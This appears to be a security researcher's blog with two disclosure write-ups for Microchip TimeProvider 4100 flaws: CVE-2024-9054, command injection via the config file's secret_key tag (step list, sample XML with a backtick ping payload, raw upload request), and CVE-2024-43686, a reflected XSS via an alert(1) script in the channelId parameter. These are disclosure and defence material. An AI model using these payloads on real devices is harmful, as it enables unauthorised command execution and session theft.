0xhuesca

Wednesday, October 09, 2024

CVE-2024-9054: MICROCHIP TIMEPROVIDER® 4100 GRANDMASTER CONFIG FILE - REMOTE CODE EXECUTION (RCE)

Continuing with the analysis of the "TimeProvider 4100 grandmaster device", a Remote Code Execution (RCE) vulnerability has been identified.

TimeProvider 4100 Grandmaster Device

The issue stems from the improper handling of user input within the device’s configuration file, specifically the <secret_key> XML tag.

An attacker with access to the device’s management web interface can modify the configuration file to include a malicious payload in the secret_key field. When this modified configuration is uploaded and restored, the payload remains dormant until a login attempt is made through any active service such as SSH, Telnet, or the console interface.

Upon login, the system processes the malicious payload, leading to execution of arbitrary operating system commands with the privileges of the underlying system.

Exploitation Steps

Authenticate to the device’s management web interface.
Download the current configuration file from the interface.
Modify the <secret_key> field in the configuration file, inserting a malicious OS command or script.
Save the modified configuration file.
Restore and apply the configuration using the device’s upload function.
Trigger execution by logging in through any enabled service (e.g., SSH, Telnet, or the console). This login action initiates execution of the injected command.

An example of a malicious XML configuration file is provided below:

<?xml version="1.0"?>
[...]
 <security>
    [...]
	<server>
        	<ip>192.168.1.1</ip>
        	<secret_key>`ping 192.168.1.20`</secret_key>
        	[...]
      	</server>
    [...]
 </security>
[...]

Request RAW:

POST /config_restore HTTP/1.1
Host: [device IP]
Cookie: ci_session=[session cookie]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------182708909322642582691204887002
Content-Length: 206640
Origin: https://[device IP]
Referer: https://[device IP]/configbackuprestore
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: keep-alive

-----------------------------182708909322642582691204887002

Content-Disposition: form-data; name="file"; filename="tp4100_cfg.txt"
Content-Type: text/plain
[XML configuration file containing the injection on "secret_key" tag]

-----------------------------182708909322642582691204887002

Content-Disposition: form-data; name="pword"

[Web account password in clear-text]
-----------------------------182708909322642582691204887002--

# End

Conclusion:

This vulnerability can result in full system compromise, allowing an attacker to execute unauthorized commands, establish root persistent access, or disrupt normal device operation.

Reporting Information:

CVE Identifier: CVE-2024-9054

CVSS Score: 8.5
Affected Versions: Firmware 1.0 through 2.4.7

Tested on: Firmware release 2.3.12
Vulnerability Status: Resolved in firmware release 2.4.7
NIST: https://nvd.nist.gov/vuln/detail/CVE-2024-9054
Vendor Reference: https://www.microchip.com/en-us/solutions/technologies/embedded-security/how-to-report-potential-product-security-vulnerabilities/timeprovider-4100-grandmaster-rce-through-configuration-file

Reported by: Armando Huesca Prida, Marco Negro, Antonio Carriero, Vito Pistillo, Davide Renna, Manuel Leone, Massimiliano Brolli and TIM Security Red Team Research.

Public exploit: https://www.exploit-db.com/exploits/52119

Tuesday, October 08, 2024

CVE-2024-43686: MICROCHIP TIMEPROVIDER 4100 GRANDMASTER - REFLECTED CROSS-SITE SCRIPTING XSS

Coming across the administrative interface of the “Microchip TimeProvider® 4100 Grandmaster TP4100” device.

TimeProvider 4100 Grandmaster Device

There was a particular parameter channelId that resulted in reflecting its content in the embedded web server responses. Specifically, the request that deals with updating the charts.

Going forward in this way, after several attempts, it was possible to inject a JavaScript payload between <scripts> tags, resulting in a Reflected Cross-site Scripting Vulnerability. The following image shows an example of a request containing the malicious JavaScript payload:

Request RAW:

POST /get_chart_data HTTP/1.1
Host: XXX.XXX.XXX.XXX
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 99
Origin: https://XXX.XXX.XXX.XXX
Referer: https://XXX.XXX.XXX.XXX/perfmon_t1e1_stat
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: keep-alive

metric=mtie_a&xRange=1&tStart=-1&channelName=span&channelId=1%3cscript%3ealert(1)%3c%2fscript%3easd

Payload execution on the victim’s browser:

Conclusion:

An unauthenticated user can insert JavaScript snippets in channelId parameter on the specified POST request to the web resource get_chart_data. In the worst case, attackers will be able to perform privileged operations by stealing administrative user’s session or gain access to sensitive information belonging to the user.

Reporting Information:

CVE Identifier: CVE-2024-43686

CVSS Score: 8.0
Affected Versions: Firmware 1.0 through 2.4.7
Vulnerability Status: Resolved in firmware release 2.4.7
NIST: https://nvd.nist.gov/vuln/detail/CVE-2024-43686
Vendor Reference: https://www.microchip.com/en-us/solutions/technologies/embedded-security/how-to-report-potential-product-security-vulnerabilities/timeprovider-4100-grandmaster-reflected-xss-vulnerability
Reported by: Armando Huesca Prida, Marco Negro, Antonio Carriero, Vito Pistillo, Davide Renna, Manuel Leone, Massimiliano Brolli and TIM Security Red Team Research.